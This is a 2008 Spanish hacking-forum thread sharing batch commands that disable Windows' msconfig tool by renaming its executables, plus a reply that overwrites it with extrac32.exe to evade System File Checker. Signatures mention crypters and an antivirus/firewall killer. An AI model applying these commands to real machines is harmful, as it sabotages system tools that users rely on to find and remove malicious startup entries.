elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  Desabilitar el MSCONFIG |By-Skull|
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Desabilitar el MSCONFIG |By-Skull|  (Leído 4,123 veces)
[SMT]

Desconectado Desconectado

Mensajes: 108

Phoenix Team Coder


Ver Perfil
Desabilitar el MSCONFIG |By-Skull|
« en: 9 Febrero 2008, 21:02 pm »

jeje bueno un pequeñometodo que aprendi hace tiempo en batch cuando me inicie, y bueno lo voy a compartit con ustedes, es para bloquear el msconfig (No se si todavia funcione)

CODIGO:

@echo off
ren C:\WINDOWS\ServicePackFiles\i386\msconfig.exe qwe.dll
ren C:\WINDOWS\pchealth\helpctr\binaries\msconfig.exe ewq.dll
exit


pues si no me equivico esto lo inabilita, espero que les sea util y espero que sirva todavia! :D

Salu2's!  cool


En línea

nhaalclkiemr


Desconectado Desconectado

Mensajes: 1.678


Máximo exponente 9DB9F1AEED2FADBDE 997BBE20FEDA92


Ver Perfil WWW
Re: Desabilitar el MSCONFIG |By-Skull|
« Respuesta #1 en: 11 Febrero 2008, 15:19 pm »

Lo unico que haces es renombrar el ejecutable...yo prefiero substituirlo que es menos cantoso para el SFC :xD

Código
  1. copy /Y %windir%\system32\extrac32.exe %windir%\pchealth\helpctr\binaries\msconfig.exe

Saludos ;)


En línea

StasFodidoCrypter 1.0 - 100% (old)
StasFodidoCrypter 2.0 - 85% (deserted)
Fire AV/FW-Killer - 97% (deserted)
R-WlanXDecrypter 1.0- 100%
GUN$

Desconectado Desconectado

Mensajes: 17


Ver Perfil
Re: Desabilitar el MSCONFIG |By-Skull|
« Respuesta #2 en: 11 Febrero 2008, 19:06 pm »

como el stickykeys :O jajajaja ^^
En línea

Código:
<?php
$text = "Aprendiendo PHP";
echo $text;
?>
[SMT]

Desconectado Desconectado

Mensajes: 108

Phoenix Team Coder


Ver Perfil
Re: Desabilitar el MSCONFIG |By-Skull|
« Respuesta #3 en: 12 Febrero 2008, 00:14 am »

es casi lo mismo! ;) :P
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[+] Skull Bat to Exe Compiler & Source Code!! |By-Skull|
Programación Visual Basic
[SMT] 7 6,865 Último mensaje 15 Agosto 2013, 01:09 am
por Eleкtro
MOVIDO: [+] Skull Bat to Exe Compiler & Source Code!! |By-Skull|
Scripting
Eleкtro 0 1,717 Último mensaje 11 Agosto 2013, 12:41 pm
por Eleкtro
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines